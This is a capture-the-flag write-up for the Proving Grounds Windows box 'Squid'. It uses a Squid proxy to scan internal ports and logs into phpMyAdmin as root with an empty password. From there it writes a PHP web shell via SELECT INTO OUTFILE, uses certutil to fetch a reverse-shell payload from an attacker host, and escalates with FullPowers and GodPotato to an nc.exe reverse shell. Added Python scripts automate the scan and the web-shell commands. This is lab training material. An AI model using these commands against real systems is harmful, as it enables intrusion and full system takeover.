Squid
Source: Proving Grounds
OS: Windows
Community Rating: Hard
Enumeration & Reconnaissance
Again, AutoRecon bombarded me with open ports: 135, 139, 445, 3128, 49666, 49667
Port 3128 was running Squid, which turned out to be an HTTP proxy. After loads and loads of searching I found a CVE for it but no working PoC. Instead, HackTricks pointed me to spose.py, a Squid pivoting scanner: it requests http://<host>:<port>/ for each candidate port through the proxy and reads Squid's own error page to learn whether that port is reachable from the proxy's side of the network. Running it revealed two additional open ports that were not exposed directly: 3306 and 8080.
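The proxy-side port check that spose.py automates, written out as an added example (this is my own code, not spose.py and not from the write-up). It assumes the proxy is the box's Squid on 192.168.155.189:3128, that the target is the proxy host's own loopback so the scan reaches services hidden from the outside, and a short constructed port list. The verdict rests on Squid's X-Squid-Error header: ERR_CONNECT_FAIL means Squid's TCP connect failed, ERR_ACCESS_DENIED means an ACL stopped it before connecting, and anything else (a real reply, or a Squid complaint about a bad reply from a non-HTTP service such as MySQL) means the port accepted the connection.

```python
"""Squid forward-proxy port scan in the style of spose.py (added example)."""
import http.client
from typing import Iterable, Mapping

SQUID_PROXY = ("192.168.155.189", 3128)  # the box's proxy (from the write-up)
TARGET = "127.0.0.1"                      # assumption: scan the proxy host itself
PORTS = [80, 3306, 8080, 8000, 8443]      # assumption: constructed candidate list


def classify(headers: Mapping[str, str]) -> str:
    """Turn the proxied response headers into open / closed / filtered.

    Squid sets X-Squid-Error only on error pages it generated itself:
      ERR_CONNECT_FAIL  -> TCP connect refused or timed out: port closed
      ERR_ACCESS_DENIED -> a Squid ACL rejected the request (for example the
                           default Safe_ports list): cannot tell, so filtered
    Anything else means the connect succeeded: either a real upstream reply
    or a Squid complaint about an unparseable reply (ERR_INVALID_RESP,
    ERR_ZERO_SIZE_OBJECT) from a non-HTTP listener such as MySQL: port open.
    """
    err = ""
    for name, value in headers.items():
        if name.lower() == "x-squid-error":
            err = value
    if err.startswith("ERR_CONNECT_FAIL"):
        return "closed"
    if err.startswith("ERR_ACCESS_DENIED"):
        return "filtered"
    return "open"


def scan(proxy: tuple, target: str, ports: Iterable[int], timeout: float = 5.0) -> dict:
    """Probe each port through the proxy and return {port: verdict}."""
    results = {}
    for port in ports:
        conn = http.client.HTTPConnection(proxy[0], proxy[1], timeout=timeout)
        try:
            # Absolute-URI request line, exactly what a browser sends to a
            # forward proxy; http.client derives the Host header from it.
            conn.request("GET", f"http://{target}:{port}/")
            resp = conn.getresponse()
            resp.read()
            results[port] = classify(dict(resp.getheaders()))
        except (OSError, http.client.HTTPException):
            # No usable reply before our timeout. Squid may still be waiting
            # on a listener that accepted but never spoke, so do not call
            # this closed.
            results[port] = "unknown"
        finally:
            conn.close()
    return results


if __name__ == "__main__":
    for port, verdict in scan(SQUID_PROXY, TARGET, PORTS).items():
        print(f"{port:5d}  {verdict}")
```

Two caveats when reading the output: "filtered" on low ports (135, 139, 445) is usually Squid's default Safe_ports ACL rather than the host, and "unknown" means the client timed out before Squid gave up on its upstream read, so treat it as a candidate, not a negative.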


Gaining Initial Access
To interact with them, I pointed my browser at the Squid proxy and started investigating.

3306 was a MySQL service; browsing to it through the proxy just served a dummy file to download.
8080 was where things got interesting: phpMyAdmin was exposed!
I tried root with an empty password, and it worked. After checking the tables, nothing valuable popped up, so I decided to upload a shell using SQL.

First, I needed the web root directory. phpMyAdmin's phpinfo() page came in handy and gave me the path (C:/wamp/www). MySQL can then write the shell straight into it with SELECT ... INTO OUTFILE, which works as long as secure_file_priv does not restrict the output directory and the MySQL service account is allowed to write there:
select '<?php system($_GET["cmd"]); ?>' into outfile 'C:/wamp/www/shell.php';

With that, I had a web shell that runs whatever is passed in the cmd parameter. Time to get a full reverse shell: I hosted a reverse-shell payload on my own web server (served as shell.php), pulled it down with certutil and then executed it, both through the web shell:
http://192.168.155.189:8080/shell.php?cmd=certutil%20-urlcache%20-split%20-f%20http%3A%2F%2F192.168.45.240%3A901%2Fshell.php
http://192.168.155.189:8080/shell.php?cmd=.%2Fshell.php
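The same two steps driven from a script instead of the browser, as an added example (my code, not from the write-up). It assumes the shell sits at http://192.168.155.189:8080/shell.php (the path written by INTO OUTFILE), that 8080 is only reachable through the proxy on 192.168.155.189:3128, and that the payload is staged at http://192.168.45.240:901/shell.php. The point worth seeing is the encoding: quote() with safe='' produces exactly the %20/%3A/%2F form the browser sent above, so the staged URL survives the trip through the proxy and PHP's query parsing intact.

```python
"""Drive the INTO OUTFILE web shell through the Squid proxy (added example)."""
import http.client
from urllib.parse import quote

PROXY = ("192.168.155.189", 3128)                # the box's Squid (from the write-up)
SHELL = "http://192.168.155.189:8080/shell.php"  # written by INTO OUTFILE
STAGED = "http://192.168.45.240:901/shell.php"   # assumption: payload on the attacker's web server


def shell_url(cmd: str, base: str = SHELL) -> str:
    """Build the GET URL for one command.

    safe='' percent-encodes everything except unreserved characters, so the
    spaces, ':' and '/' inside the command (including a URL passed to
    certutil) cannot be mistaken for query-string structure by PHP.
    """
    return f"{base}?cmd={quote(cmd, safe='')}"


def run(cmd: str, proxy=PROXY, timeout: float = 30.0) -> str:
    """Send the command via the forward proxy and return what system() printed."""
    conn = http.client.HTTPConnection(proxy[0], proxy[1], timeout=timeout)
    try:
        conn.request("GET", shell_url(cmd))  # absolute URI: forward-proxy form
        resp = conn.getresponse()
        return resp.read().decode("utf-8", errors="replace")
    finally:
        conn.close()


if __name__ == "__main__":
    # The two steps from the write-up: stage the payload with certutil, then run it.
    print(run(f"certutil -urlcache -split -f {STAGED}"))
    print(run("./shell.php"))
```

Start the listener on your side before the second call; system() blocks until the payload exits, so the HTTP request will hang for as long as the reverse shell lives.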

Privilege Escalation
After getting a foothold, I checked user privileges, uploaded winPEAS and looked around, but nothing obvious stood out. Then, searching online, I found a trick that lets service accounts regain their default privilege set: the PoC FullPowers.exe. Downloading and running it gave me SeImpersonatePrivilege back, alongside the other privileges the account normally holds.

With SeImpersonatePrivilege available, I could use GodPotato to escalate to SYSTEM:
certutil -urlcache -split -f http://192.168.45.240:901/GodPotato-NET4.exe
certutil -urlcache -split -f http://192.168.45.240:901/nc.exe
.\GodPotato-NET4.exe -cmd ".\nc.exe -t -e C:\Windows\System32\cmd.exe 192.168.45.240 9100"
And just like that, I was SYSTEM.

Lessons Learned
Default creds still work in 2024.
Sometimes searching for a working PoC is a waste of time; pivoting to alternative tooling (like spose.py) can be faster.
phpMyAdmin + empty root password = instant win. Upload a web shell right away, provided MySQL can write into the web root.
Web shells are still one of the easiest ways to pivot into a full reverse shell.
When you land as a service account with a stripped-down token, restoring its default privileges (FullPowers) can be the path back to SeImpersonatePrivilege and a potato.